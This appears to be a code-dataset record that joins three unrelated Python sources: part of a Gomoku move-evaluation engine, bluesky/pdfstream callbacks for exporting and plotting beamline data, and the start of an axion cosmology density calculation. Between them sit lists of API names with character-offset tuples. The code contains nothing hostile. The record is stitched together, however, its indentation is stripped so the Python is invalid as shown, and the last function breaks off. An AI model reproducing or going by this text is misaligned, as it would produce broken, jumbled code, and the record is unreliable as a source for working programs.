final_single_move[0,1] = c
force_to_block = True
if force_to_block == False:
# if I will win after this move, I won't consider other moves
if forward_my_open == True and my_line_length == 4:
my_hard_4 += 1
if backward_my_open == True and my_line_length_back == 4:
my_hard_4 += 1
if my_hard_4 >= 2:
final_single_move[0,0] = r
final_single_move[0,1] = c
exist_will_win_move = True
if force_to_block == False and exist_will_win_move == False:
# compute the interest_value for other moves
# if any line length >= 5, it's an overline so skipped
if (forward_my_open == True) and (my_line_length < 5):
interest_value += my_line_length ** 4
if (backward_my_open == True) and (my_line_length_back < 5):
interest_value += my_line_length_back ** 4
if (forward_opponent_open == True) and (opponent_line_length < 5):
interest_value += opponent_line_length ** 4
if (backward_opponent_open == True) and (opponent_line_length_back < 5):
interest_value += opponent_line_length_back ** 4
# if (r,c) == (5,5):
# print("(dr,dc) =", dr,dc)
# print('forward_my_open', forward_my_open, "my_line_length", my_line_length)
# print('backward_my_open', backward_my_open,"my_line_length_back", my_line_length_back)
# print('forward_opponent_open',forward_opponent_open,'opponent_line_length',opponent_line_length)
# print('backward_opponent_open',backward_opponent_open,'opponent_line_length_back',opponent_line_length_back)
# print("interest_value=", interest_value)
# after looking at all directions, record the total interest_value of this move
move_interest_values[r, c] += interest_value
if interest_value > 256: # one (length_4) ** 4, highly interesting move
n_moves += 1
# all moves have been investigated now see if we have to block first
if force_to_block == True or exist_will_win_move == True:
if verbose == True:
print(final_single_move[0,0], final_single_move[0,1], "Only One")
return final_single_move
else:
flattened_interest = move_interest_values.ravel()
# The interest value > 250 means at least one length_4 or three length_3 which make it highly interesting
#n_high_interest_moves = np.sum(flattened_interest > 266) # did it in the loop
if n_moves > empty_spots_left:
n_moves = empty_spots_left
high_interest_idx = np.argsort(flattened_interest)[-n_moves:][::-1]
interested_moves = np.empty(n_moves*2, dtype=np.int64).reshape(n_moves, 2)
interested_moves[:,0] = high_interest_idx // board_size
interested_moves[:,1] = high_interest_idx % board_size
if verbose == True:
print("There are", n_moves, "interested_moves")
for i in range(n_moves):
print(interested_moves[i,0],interested_moves[i,1],' : ', flattened_interest[high_interest_idx[i]])
return interested_moves
@numba.jit(nopython=True,nogil=True)
def i_win(state, last_move, player):
""" Return true if I just got 5-in-a-row with last_move """
r, c = last_move
# try all 4 directions, the other 4 is included
directions = [(1,1), (1,0), (0,1), (1,-1)]
for dr, dc in directions:
line_length = 1 # last_move
# try to extend in the positive direction (max 4 times)
ext_r = r
ext_c = c
for _ in range(5):
ext_r += dr
ext_c += dc
if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
break
elif state[ext_r, ext_c] == player:
line_length += 1
else:
break
# try to extend in the opposite direction
ext_r = r
ext_c = c
for _ in range(6-line_length):
ext_r -= dr
ext_c -= dc
if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
break
elif state[ext_r, ext_c] == player:
line_length += 1
else:
break
if line_length == 5:
return True # 5 in a row
return False
@numba.jit(nopython=True,nogil=True)
def i_lost(state, player):
for r in range(board_size):
for c in range(board_size):
if state[r,c] == 0 and i_win(state, (r,c), -player):
return True
return False
@numba.jit(nopython=True,nogil=True)
def i_will_win(state, last_move, player):
""" Return true if I will win next step if the opponent don't have 4-in-a-row.
Winning Conditions:
1. 5 in a row.
2. 4 in a row with both end open. (free 4)
3. 4 in a row with one missing stone x 2 (hard 4 x 2)
"""
r, c = last_move
# try all 4 directions, the other 4 is equivalent
directions = [(1,1), (1,0), (0,1), (1,-1)]
n_hard_4 = 0 # number of hard 4s found
for dr, dc in directions:
line_length = 1 # last_move
# try to extend in the positive direction (max 5 times to check overline)
ext_r = r
ext_c = c
skipped_1 = 0
for i in range(5):
ext_r += dr
ext_c += dc
if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
break
elif state[ext_r, ext_c] == player:
line_length += 1
elif skipped_1 == 0 and state[ext_r, ext_c] == 0:
skipped_1 = i+1 # allow one skip and record the position of the skip
else:
break
# try to extend in the opposite direction
ext_r = r
ext_c = c
skipped_2 = 0
# the backward counting starts at the furthest "unskipped" stone
if skipped_1 != 0:
line_length_back = skipped_1
else:
line_length_back = line_length
line_length_no_skip = line_length_back
for i in range(6-line_length_back):
ext_r -= dr
ext_c -= dc
if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
break
elif state[ext_r, ext_c] == player:
line_length_back += 1
elif skipped_2 == 0 and state[ext_r, ext_c] == 0:
skipped_2 = i + 1
else:
break
if line_length_back == 6:
# we found 6 stones in a row, this is overline, skip this entire line
continue
elif line_length_back == 5:
if (skipped_2 == 0) or (skipped_2 == (6-line_length_no_skip)):
# we found 5 stones in a row, because the backward counting is not skipped in the middle
return True
# else there is an empty spot in the middle of 6 stones, it's not a hard 4 any more
elif line_length_back == 4:
# here we have only 4 stones, if skipped in back count, it's a hard 4
if skipped_2 != 0:
n_hard_4 += 1 # backward hard 4
if n_hard_4 == 2:
return True # two hard 4
# here we check if there's a hard 4 in the forward direction
# extend the forward line to the furthest "unskipped" stone
if skipped_2 == 0:
line_length += line_length_back - line_length_no_skip
else:
line_length += skipped_2 - 1
# hard 4 only if forward length is 4, if forward reaches 5 or more, it's going to be overline
if line_length == 4 and skipped_1 != 0:
n_hard_4 += 1 # forward hard 4
if n_hard_4 == 2:
return True # two hard 4 or free 4
return False
from collections import OrderedDict
class LRU(OrderedDict):
'Limit size, evicting the least recently looked-up key when full'
def __init__(self, maxsize=128):
self.maxsize = maxsize
super().__init__()
def __getitem__(self, key):
value = super().__getitem__(key)
self.move_to_end(key)
return value
def __setitem__(self, key, value):
if key in self:
self.move_to_end(key)
super().__setitem__(key, value)
if len(self) > self.maxsize:
oldest = next(iter(self))
del self[oldest]
def read_board_state(f):
# default
black_stones = []
white_stones = []
board = [black_stones, white_stones]
last_move = None
playing = 0
# read and parse board
for line in open(f):
if '|' in line:
line_idx, contents = line.split('|', maxsplit=1)
row_i = int(line_idx)
stones = contents.split()
if len(stones) == board_size:
for col_j, s in enumerate(stones):
if s == 'x':
black_stones.append((row_i, col_j))
elif s == 'X':
black_stones.append((row_i, col_j))
last_move = (row_i, col_j)
playing = 0
elif s == 'o':
white_stones.append((row_i, col_j))
elif s == 'O':
white_stones.append((row_i, col_j))
last_move = (row_i, col_j)
playing = 1
elif s == '-':
pass
else:
print(f'found unknown stone: {s}')
board_state = [board, last_move, playing, board_size]
return board_state | [
"numpy.argmax",
"numpy.empty",
"numpy.zeros",
"numpy.argsort",
"numba.jit",
"numpy.array"
] | [((8858, 8894), 'numba.jit', 'numba.jit', ([], {'nopython': '(True)', 'nogil': '(True)'}), '(nopython=True, nogil=True)\n', (8867, 8894), False, 'import numba\n'), ((20434, 20470), 'numba.jit', 'numba.jit', ([], {'nopython': '(True)', 'nogil': '(True)'}), '(nopython=True, nogil=True)\n', (20443, 20470), False, 'import numba\n'), ((21646, 21682), 'numba.jit', 'numba.jit', ([], {'nopython': '(True)', 'nogil': '(True)'}), '(nopython=True, nogil=True)\n', (21655, 21682), False, 'import numba\n'), ((21889, 21925), 'numba.jit', 'numba.jit', ([], {'nopython': '(True)', 'nogil': '(True)'}), '(nopython=True, nogil=True)\n', (21898, 21925), False, 'import numba\n'), ((6901, 6921), 'numpy.argmax', 'np.argmax', (['predict_y'], {}), '(predict_y)\n', (6910, 6921), True, 'import numpy as np\n'), ((9732, 9759), 'numpy.zeros', 'np.zeros', (['(2)'], {'dtype': 'np.int64'}), '(2, dtype=np.int64)\n', (9740, 9759), True, 'import numpy as np\n'), ((411, 458), 'numpy.zeros', 'np.zeros', (['(board_size ** 4 * 3)'], {'dtype': 'np.float16'}), '(board_size ** 4 * 3, dtype=np.float16)\n', (419, 458), True, 'import numpy as np\n'), ((543, 586), 'numpy.zeros', 'np.zeros', (['(board_size ** 2)'], {'dtype': 'np.float32'}), '(board_size ** 2, dtype=np.float32)\n', (551, 586), True, 'import numpy as np\n'), ((1749, 1789), 'numpy.zeros', 'np.zeros', (['(board_size ** 2)'], {'dtype': 'np.int8'}), '(board_size ** 2, dtype=np.int8)\n', (1757, 1789), True, 'import numpy as np\n'), ((19899, 19929), 'numpy.argsort', 'np.argsort', (['flattened_interest'], {}), '(flattened_interest)\n', (19909, 19929), True, 'import numpy as np\n'), ((19974, 20011), 'numpy.empty', 'np.empty', (['(n_moves * 2)'], {'dtype': 'np.int64'}), '(n_moves * 2, dtype=np.int64)\n', (19982, 20011), True, 'import numpy as np\n'), ((6674, 6693), 'numpy.array', 'np.array', (['predict_y'], {}), '(predict_y)\n', (6682, 6693), True, 'import numpy as np\n')] |
import copy
import typing as tp
from pathlib import Path
import numpy as np
import pandas as pd
import yaml
from bluesky.callbacks import CallbackBase
from bluesky.callbacks.best_effort import LivePlot, LiveScatter
from bluesky.callbacks.broker import LiveImage
from databroker.v2 import Broker
from event_model import unpack_event_page
from matplotlib import pyplot as plt
from matplotlib.axes import Axes
from matplotlib.widgets import Slider
from pyFAI.io.ponifile import PoniFile
from suitcase.tiff_series import Serializer as TiffSerializer
from xpdview.waterfall import Waterfall
import pdfstream.callbacks.from_descriptor as fd
import pdfstream.callbacks.from_start as fs
import pdfstream.io as io
from pdfstream.vend.formatters import SpecialStr
class ArrayExporter(CallbackBase):
"""An base class for the callbacks to find and export the 1d array."""
_file_suffix = ""
_file_stem = "{descriptor[name]}-{field}-{event[seq_num]}"
def __init__(self, directory: str, *, file_prefix: str, data_keys: list = None):
super(ArrayExporter, self).__init__()
self.directory = Path(directory)
self.directory.mkdir(parents=True, exist_ok=True)
self._file_prefix = file_prefix
self._file_template = ""
self.data_keys = data_keys
self.start_doc = {}
self.descriptor_doc = {}
self._indeps = set()
self._indep2unit = {}
def start(self, doc):
self.start_doc = doc
self._indeps = fs.get_indeps(doc, exclude={"time"})
super(ArrayExporter, self).start(doc)
def descriptor(self, doc):
if not self.data_keys:
self.data_keys = list(fd.yield_1d_array(doc["data_keys"]))
self.descriptor_doc = doc
self._indep2unit = fd.get_units(doc["data_keys"], self._indeps)
super(ArrayExporter, self).descriptor(doc)
def event(self, doc):
indep_str = fd.get_indep_str(doc["data"], self._indep2unit)
self._file_template = SpecialStr(
self._file_prefix + indep_str + self._file_stem + self._file_suffix
)
self.export(doc)
super(ArrayExporter, self).event(doc)
def event_page(self, doc):
for event in unpack_event_page(doc):
self.event(event)
def stop(self, doc):
super(ArrayExporter, self).stop(doc)
def export(self, doc):
pass
class NumpyExporter(ArrayExporter):
"""An exporter to export the array data one by one in .npy file."""
_file_suffix = ".npy"
def export(self, doc):
for data_key in self.data_keys:
arr: np.ndarray = doc["data"][data_key]
filename = self._file_template.format(start=self.start_doc, descriptor=self.descriptor_doc, event=doc,
field=data_key)
filepath = self.directory.joinpath(filename)
np.save(str(filepath), arr)
class StackedNumpyExporter(ArrayExporter):
"""An exporter to export the column-stacked array data in .npy file."""
_file_suffix = ".npy"
def export(self, doc):
arr: np.ndarray = np.stack([doc["data"][data_key] for data_key in self.data_keys], axis=-1)
field = "_".join(self.data_keys)
filename = self._file_template.format(start=self.start_doc, descriptor=self.descriptor_doc, event=doc,
field=field)
filepath = self.directory.joinpath(filename)
np.save(str(filepath), arr)
class StackedNumpyTextExporter(CallbackBase):
"""An base class for the callbacks to find and export the 1d array."""
_file_stem = "{descriptor[name]}-{event[seq_num]}"
def __init__(self, file_prefix: str, *args, no_single_value: bool = True):
"""Args are sequences of 'directory to export', 'data keys to combine', 'file suffix'."""
super(StackedNumpyTextExporter, self).__init__()
self._no_single_value = no_single_value
self._file_prefix = file_prefix
self._file_template = ""
self.directories = tuple(map(Path, args[::3]))
self.data_keys = args[1::3]
self.file_suffixes = args[2::3]
self.start_doc = {}
self.descriptor_doc = {}
self._indeps = set()
self._indep2unit = {}
def start(self, doc):
self.start_doc = doc
self._indeps = fs.get_indeps(doc, exclude={"time"})
super(StackedNumpyTextExporter, self).start(doc)
def descriptor(self, doc):
self.descriptor_doc = doc
self._indep2unit = fd.get_units(doc["data_keys"], self._indeps)
super(StackedNumpyTextExporter, self).descriptor(doc)
def event(self, doc):
indep_str = fd.get_indep_str(doc["data"], self._indep2unit)
self._file_template = SpecialStr(
self._file_prefix + indep_str + self._file_stem
)
self.export(doc)
super(StackedNumpyTextExporter, self).event(doc)
def event_page(self, doc):
for event in unpack_event_page(doc):
self.event(event)
def stop(self, doc):
super(StackedNumpyTextExporter, self).stop(doc)
def export(self, doc):
for directory, data_key_tup, file_suffix in zip(self.directories, self.data_keys, self.file_suffixes):
arr: np.ndarray = np.stack([doc["data"][data_key] for data_key in data_key_tup], axis=-1)
if arr.ndim == 2 and arr.shape[0] <= 1 and self._no_single_value:
continue
filename = self._file_template.format(start=self.start_doc, descriptor=self.descriptor_doc, event=doc)
filename += file_suffix
directory.mkdir(exist_ok=True, parents=True)
filepath = directory.joinpath(filename)
header = " ".join(data_key_tup)
np.savetxt(str(filepath), arr, header=header)
class DataFrameExporter(ArrayExporter):
"""An exporter to export data in a dataframe in the .csv file."""
_file_suffix = ".csv"
def export(self, doc):
_data = {data_key: pd.Series(doc["data"][data_key]) for data_key in self.data_keys}
df = pd.DataFrame(data=_data)
filename = self._file_template.format(start=self.start_doc, descriptor=self.descriptor_doc, event=doc,
field="data")
filepath = self.directory.joinpath(filename)
df.to_csv(str(filepath))
class MyLiveImage(LiveImage):
"""A customized LiveImage."""
def update(self, data):
data_arr = np.asarray(data)
super(MyLiveImage, self).update(data_arr)
def show(self):
self.cs._fig.show()
class LiveMaskedImage(LiveImage):
"""Live image show of a image with a mask."""
def __init__(self, field: str, msk_field: str, *, cmap: str, norm: tp.Callable = None,
limit_func: tp.Callable = None, auto_draw: bool = True, interpolation: str = None,
window_title: str = None, db: Broker = None):
self.msk_field = msk_field
self.msk_array = None
super(LiveMaskedImage, self).__init__(
field, cmap=cmap, norm=norm, limit_func=limit_func,
auto_redraw=auto_draw, interpolation=interpolation, window_title=window_title, db=db
)
def event(self, doc):
super(LiveImage, self).event(doc)
data_arr = np.ma.masked_array(doc["data"][self.field], doc["data"][self.msk_field])
self.update(data_arr)
def show(self):
self.cs._fig.show()
class MyWaterfall(Waterfall):
"""An adaptation of WaterFall. Allow using ax instead of Figure."""
def __init__(self, *, xlabel: str, ylabel: str, ax: Axes, **kwargs):
super(Waterfall, self).__init__()
self.ax = ax
self.fig = self.ax.figure
self.canvas = self.fig.canvas
self.kwargs = kwargs
self.x_array_list = []
self.y_array_list = []
# callback for showing legend
self.canvas.mpl_connect("pick_event", self.on_plot_hover)
self.key_list = []
self.unit = (xlabel, ylabel)
# add sliders, which store information
self.ydist = 0
self.xdist = 0
y_offset_slider_ax = self.fig.add_axes([0.15, 0.95, 0.25, 0.035])
self.y_offset_slider = Slider(
y_offset_slider_ax,
"y-offset",
0.0,
1.0,
valinit=0.1,
valfmt="%1.2f",
)
self.y_offset_slider.on_changed(self.update_y_offset)
x_offset_slider_ax = self.fig.add_axes([0.6, 0.95, 0.25, 0.035])
self.x_offset_slider = Slider(
x_offset_slider_ax,
"x-offset",
0.0,
1.0,
valinit=0.,
valfmt="%1.2f",
)
self.x_offset_slider.on_changed(self.update_x_offset)
class LiveWaterfall(CallbackBase):
"""A live water plot for the one dimensional data."""
def __init__(self, x: str, y: str, *, xlabel: str, ylabel: str, ax: Axes, **kwargs):
"""Initiate the instance.
Parameters
----------
x :
The key of the independent variable.
y :
The key of the dependent variable.
xlabel :
The tuple of the labels of x shown in the figure.
ylabel :
The tuple of the labels of y shown in the figure.
ax :
The axes to plot.
kwargs :
The kwargs for the matplotlib.pyplot.plot.
"""
super().__init__()
self.x = x
self.y = y
self.ax = ax
self.waterfall = MyWaterfall(xlabel=xlabel, ylabel=ylabel, ax=self.ax, **kwargs)
def start(self, doc):
super(LiveWaterfall, self).start(doc)
self.waterfall.clear()
def event(self, doc):
super(LiveWaterfall, self).event(doc)
x_data = doc["data"][self.x]
y_data = doc["data"][self.y]
key = doc['seq_num']
self.update(key, (x_data, y_data))
def update(self, key: str, int_data: tp.Tuple[np.ndarray, np.ndarray]):
self.waterfall.update(key_list=[key], int_data_list=[int_data])
def show(self):
self.ax.figure.show()
class SmartScalarPlot(CallbackBase):
"""A plot for scalar variable. Use LivePlot for one dimensional case and Use LiveScatter for two dimensional
case """
def __init__(self, y: str, *, ax: Axes = None, ylabel: str = None, **kwargs):
super(SmartScalarPlot, self).__init__()
self.y = y
if ax is None:
fig = plt.figure()
ax = fig.add_subplot(111)
self.ax = ax
self.ylabel = ylabel
self.kwargs = kwargs
self.callback = None
def start(self, doc):
self.ax.cla()
super(SmartScalarPlot, self).start(doc)
self.clear()
indeps = fs.get_indeps(doc, exclude={"time"})
if len(indeps) == 1:
self.callback = LivePlot(self.y, x=indeps.pop(), ax=self.ax, **self.kwargs)
elif len(indeps) == 2:
self.callback = LiveScatter(indeps.pop(), indeps.pop(), self.y, ax=self.ax, **self.kwargs)
else:
self.callback = LivePlot(self.y, ax=self.ax, **self.kwargs)
self.callback.start(doc)
def descriptor(self, doc):
super(SmartScalarPlot, self).descriptor(doc)
self.callback.descriptor(doc)
def event(self, doc):
super(SmartScalarPlot, self).event(doc)
self.callback.event(doc, )
if self.ylabel:
self.ax.set_ylabel(self.ylabel)
def stop(self, doc):
super(SmartScalarPlot, self).stop(doc)
self.callback.stop(doc, )
def clear(self):
self.ax.cla()
self.callback = None
def show(self):
self.ax.figure.show()
class MyTiffSerializer(TiffSerializer):
"""A TiffSerializer that allows specific data keys to be exported."""
def __init__(self, directory, file_prefix: SpecialStr, data_keys=None, astype='uint32',
bigtiff=False, byteorder=None, imagej=False, **kwargs):
super(MyTiffSerializer, self).__init__(directory, file_prefix=file_prefix, astype=astype,
bigtiff=bigtiff, byteorder=byteorder, imagej=imagej, **kwargs)
self.data_keys = data_keys
self._indeps = frozenset()
self._indep2unit = dict()
def start(self, doc):
self._indeps = fs.get_indeps(doc, exclude={"time"})
return super(MyTiffSerializer, self).start(doc)
def descriptor(self, doc):
self._indep2unit = fd.get_units(doc["data_keys"], self._indeps)
return super(MyTiffSerializer, self).descriptor(doc)
def event(self, doc):
# add indep
_file_prefix = copy.copy(self._file_prefix)
indep_str = fd.get_indep_str(doc["data"], self._indep2unit)
self._file_prefix = SpecialStr(_file_prefix + indep_str)
# select data key
if not self.data_keys:
returned = super(MyTiffSerializer, self).event(doc)
else:
doc = dict(doc)
doc["data"] = {k: v for k, v in doc["data"].items() if k in self.data_keys}
returned = super(MyTiffSerializer, self).event(doc)
# go back to original data key
self._file_prefix = _file_prefix
return returned
class CalibrationExporter(CallbackBase):
"""Export the calibration metadata in poni file."""
def __init__(self, directory: str, file_prefix: str = "start[uid]_", md_key: str = "calibration_md"):
super(CalibrationExporter, self).__init__()
self._directory = Path(directory).expanduser()
self._directory.mkdir(exist_ok=True, parents=True)
self._file_prefix = SpecialStr(file_prefix)
self._md_key = md_key
self._directory.mkdir(exist_ok=True, parents=True)
def start(self, doc):
if self._md_key in doc:
calibration_md = doc[self._md_key]
pf = PoniFile()
pf.read_from_dict(calibration_md)
file_prefix = self._file_prefix.format(start=doc)
file_name = file_prefix.strip("_")
file_path = self._directory.joinpath(file_name).with_suffix(".poni")
with file_path.open("w") as f:
pf.write(f)
else:
io.server_message("Missing 'calibration_md' in the start.")
return super(CalibrationExporter, self).start(doc)
class YamlSerializer(CallbackBase):
"""Export the start document in yaml file."""
def __init__(self, directory: str, file_prefix: str = "start[uid]_"):
super(YamlSerializer, self).__init__()
self._directory = Path(directory).expanduser()
self._directory.mkdir(exist_ok=True, parents=True)
self._file_prefix = file_prefix
def start(self, doc):
file_prefix = self._file_prefix.format(start=doc)
filename = file_prefix.strip("_")
file_path = self._directory.joinpath(filename).with_suffix(".yaml")
with file_path.open("w") as f:
yaml.dump(doc, f)
return super(YamlSerializer, self).start(doc)
| [
"matplotlib.widgets.Slider",
"yaml.dump",
"pdfstream.callbacks.from_descriptor.yield_1d_array",
"pathlib.Path",
"matplotlib.pyplot.figure",
"numpy.ma.masked_array",
"bluesky.callbacks.best_effort.LivePlot",
"pandas.DataFrame",
"event_model.unpack_event_page",
"pyFAI.io.ponifile.PoniFile",
"numpy... | [((1110, 1125), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (1114, 1125), False, 'from pathlib import Path\n'), ((1491, 1527), 'pdfstream.callbacks.from_start.get_indeps', 'fs.get_indeps', (['doc'], {'exclude': "{'time'}"}), "(doc, exclude={'time'})\n", (1504, 1527), True, 'import pdfstream.callbacks.from_start as fs\n'), ((1769, 1813), 'pdfstream.callbacks.from_descriptor.get_units', 'fd.get_units', (["doc['data_keys']", 'self._indeps'], {}), "(doc['data_keys'], self._indeps)\n", (1781, 1813), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((1912, 1959), 'pdfstream.callbacks.from_descriptor.get_indep_str', 'fd.get_indep_str', (["doc['data']", 'self._indep2unit'], {}), "(doc['data'], self._indep2unit)\n", (1928, 1959), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((1990, 2069), 'pdfstream.vend.formatters.SpecialStr', 'SpecialStr', (['(self._file_prefix + indep_str + self._file_stem + self._file_suffix)'], {}), '(self._file_prefix + indep_str + self._file_stem + self._file_suffix)\n', (2000, 2069), False, 'from pdfstream.vend.formatters import SpecialStr\n'), ((2216, 2238), 'event_model.unpack_event_page', 'unpack_event_page', (['doc'], {}), '(doc)\n', (2233, 2238), False, 'from event_model import unpack_event_page\n'), ((3117, 3190), 'numpy.stack', 'np.stack', (["[doc['data'][data_key] for data_key in self.data_keys]"], {'axis': '(-1)'}), "([doc['data'][data_key] for data_key in self.data_keys], axis=-1)\n", (3125, 3190), True, 'import numpy as np\n'), ((4355, 4391), 'pdfstream.callbacks.from_start.get_indeps', 'fs.get_indeps', (['doc'], {'exclude': "{'time'}"}), "(doc, exclude={'time'})\n", (4368, 4391), True, 'import pdfstream.callbacks.from_start as fs\n'), ((4542, 4586), 'pdfstream.callbacks.from_descriptor.get_units', 'fd.get_units', (["doc['data_keys']", 'self._indeps'], {}), "(doc['data_keys'], self._indeps)\n", (4554, 4586), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((4696, 4743), 'pdfstream.callbacks.from_descriptor.get_indep_str', 'fd.get_indep_str', (["doc['data']", 'self._indep2unit'], {}), "(doc['data'], self._indep2unit)\n", (4712, 4743), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((4774, 4833), 'pdfstream.vend.formatters.SpecialStr', 'SpecialStr', (['(self._file_prefix + indep_str + self._file_stem)'], {}), '(self._file_prefix + indep_str + self._file_stem)\n', (4784, 4833), False, 'from pdfstream.vend.formatters import SpecialStr\n'), ((4991, 5013), 'event_model.unpack_event_page', 'unpack_event_page', (['doc'], {}), '(doc)\n', (5008, 5013), False, 'from event_model import unpack_event_page\n'), ((6104, 6128), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': '_data'}), '(data=_data)\n', (6116, 6128), True, 'import pandas as pd\n'), ((6500, 6516), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (6510, 6516), True, 'import numpy as np\n'), ((7328, 7400), 'numpy.ma.masked_array', 'np.ma.masked_array', (["doc['data'][self.field]", "doc['data'][self.msk_field]"], {}), "(doc['data'][self.field], doc['data'][self.msk_field])\n", (7346, 7400), True, 'import numpy as np\n'), ((8253, 8330), 'matplotlib.widgets.Slider', 'Slider', (['y_offset_slider_ax', '"""y-offset"""', '(0.0)', '(1.0)'], {'valinit': '(0.1)', 'valfmt': '"""%1.2f"""'}), "(y_offset_slider_ax, 'y-offset', 0.0, 1.0, valinit=0.1, valfmt='%1.2f')\n", (8259, 8330), False, 'from matplotlib.widgets import Slider\n'), ((8581, 8658), 'matplotlib.widgets.Slider', 'Slider', (['x_offset_slider_ax', '"""x-offset"""', '(0.0)', '(1.0)'], {'valinit': '(0.0)', 'valfmt': '"""%1.2f"""'}), "(x_offset_slider_ax, 'x-offset', 0.0, 1.0, valinit=0.0, valfmt='%1.2f')\n", (8587, 8658), False, 'from matplotlib.widgets import Slider\n'), ((10819, 10855), 'pdfstream.callbacks.from_start.get_indeps', 'fs.get_indeps', (['doc'], {'exclude': "{'time'}"}), "(doc, exclude={'time'})\n", (10832, 10855), True, 'import pdfstream.callbacks.from_start as fs\n'), ((12402, 12438), 'pdfstream.callbacks.from_start.get_indeps', 'fs.get_indeps', (['doc'], {'exclude': "{'time'}"}), "(doc, exclude={'time'})\n", (12415, 12438), True, 'import pdfstream.callbacks.from_start as fs\n'), ((12554, 12598), 'pdfstream.callbacks.from_descriptor.get_units', 'fd.get_units', (["doc['data_keys']", 'self._indeps'], {}), "(doc['data_keys'], self._indeps)\n", (12566, 12598), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((12730, 12758), 'copy.copy', 'copy.copy', (['self._file_prefix'], {}), '(self._file_prefix)\n', (12739, 12758), False, 'import copy\n'), ((12779, 12826), 'pdfstream.callbacks.from_descriptor.get_indep_str', 'fd.get_indep_str', (["doc['data']", 'self._indep2unit'], {}), "(doc['data'], self._indep2unit)\n", (12795, 12826), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((12855, 12891), 'pdfstream.vend.formatters.SpecialStr', 'SpecialStr', (['(_file_prefix + indep_str)'], {}), '(_file_prefix + indep_str)\n', (12865, 12891), False, 'from pdfstream.vend.formatters import SpecialStr\n'), ((13711, 13734), 'pdfstream.vend.formatters.SpecialStr', 'SpecialStr', (['file_prefix'], {}), '(file_prefix)\n', (13721, 13734), False, 'from pdfstream.vend.formatters import SpecialStr\n'), ((5296, 5367), 'numpy.stack', 'np.stack', (["[doc['data'][data_key] for data_key in data_key_tup]"], {'axis': '(-1)'}), "([doc['data'][data_key] for data_key in data_key_tup], axis=-1)\n", (5304, 5367), True, 'import numpy as np\n'), ((6026, 6058), 'pandas.Series', 'pd.Series', (["doc['data'][data_key]"], {}), "(doc['data'][data_key])\n", (6035, 6058), True, 'import pandas as pd\n'), ((10525, 10537), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (10535, 10537), True, 'from matplotlib import pyplot as plt\n'), ((13947, 13957), 'pyFAI.io.ponifile.PoniFile', 'PoniFile', ([], {}), '()\n', (13955, 13957), False, 'from pyFAI.io.ponifile import PoniFile\n'), ((14291, 14350), 'pdfstream.io.server_message', 'io.server_message', (['"""Missing \'calibration_md\' in the start."""'], {}), '("Missing \'calibration_md\' in the start.")\n', (14308, 14350), True, 'import pdfstream.io as io\n'), ((15028, 15045), 'yaml.dump', 'yaml.dump', (['doc', 'f'], {}), '(doc, f)\n', (15037, 15045), False, 'import yaml\n'), ((1671, 1706), 'pdfstream.callbacks.from_descriptor.yield_1d_array', 'fd.yield_1d_array', (["doc['data_keys']"], {}), "(doc['data_keys'])\n", (1688, 1706), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((11149, 11192), 'bluesky.callbacks.best_effort.LivePlot', 'LivePlot', (['self.y'], {'ax': 'self.ax'}), '(self.y, ax=self.ax, **self.kwargs)\n', (11157, 11192), False, 'from bluesky.callbacks.best_effort import LivePlot, LiveScatter\n'), ((13595, 13610), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (13599, 13610), False, 'from pathlib import Path\n'), ((14646, 14661), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (14650, 14661), False, 'from pathlib import Path\n')] |
import scipy.integrate as integrate
import numpy as np
import numpy.random as rd
from fractions import *
import scipy as sp
import sys
def axionphi(y,N):
phi = np.sum(y[:,0:-1:3][:],axis=-1)
phid = np.sum(y[:,1::3][:],axis=1)
return phi,phid
def dense(rhol,rho_m0,rho_r0,rho_b0,N,y,n,t,ma_array):
rhom=[]
rhor=[]
rhob=[]
rhoa = np.sum(y[:,2::3][:],axis=-1)
for i in range(N):
rhom.append(rho_m0/y[:,-1][i]**3.)
rhor.append(rho_r0/y[:,-1][i]**4.)
rhob.append(rho_b0/y[:,-1][i]**4.)
rholl = [rhol]*N
rhom = np.array(rhom)
rhol = np.array(rhol)
rhor = np.array(rhor)
rhoa = np.array(rhoa)
rhob = np.array(rhob)
rhosum = rhom+rhol+rhor+rhoa+rhob
omegar = rhor/rhosum
omegam = rhom/rhosum
omegaa = rhoa/rhosum
omegal = rhol/rhosum
omegab = rhob/rhosum
H = (1.0/np.sqrt(3.0))*np.sqrt(rhosum[0:len(t)])
rhoo=[]
rhon=[]
for ii in range (N):
rhoa_de = 0
rhoa_dm = 0
rhoa_de2 = 0
rhoa_dm2 = 0
for j in range (n):
if 3/np.sqrt(3)*np.sqrt(rhom[ii]+rhor[ii]+rhol+rhoa[ii])>ma_array[j]:
rhoa_de = rhoa_de + y[ii,2::3][j]
else:
rhoa_dm = rhoa_dm + y[ii,2::3][j]
rhoo.append(rhoa_dm)
rhon.append(rhoa_de)
for j in range (n):
if 3/np.sqrt(3)*np.sqrt(rhom[ii]+rhor[ii]+rhol+rhoa[ii])>ma_array[j]:
rhoa_de2 = rhoa_de + y[-1,2::3][j]
else:
rhoa_dm2 = rhoa_dm + y[-1,2::3][j]
ODE = (rhoa_de2/rhosum[-1])
ODM = (rhoa_dm2/rhosum[-1])
return rhoa,rhom,rhor,rholl,rhob,rhosum,omegar,omegam,omegaa,omegal,omegab,H,rhoo,rhon,ODE,ODM,
def pressure(y,ma_array,N,n,rhom,rhol,rhor,rhoa,rhosum):
Parray = np.zeros((N,n))
for i in range(n):
field=y[:,3*i]
zero_crossings = np.where(np.diff(np.sign(field)))[0]
if np.size(zero_crossings)==0:
last_zero=N
else:
last_zero=zero_crossings[-1]
for j in range(last_zero):
Parray[j,i]=0.5*y[j,3*i+1]**2.-0.5*ma_array[i]**2.*field[j]**2.
P=np.sum(Parray,axis=1)
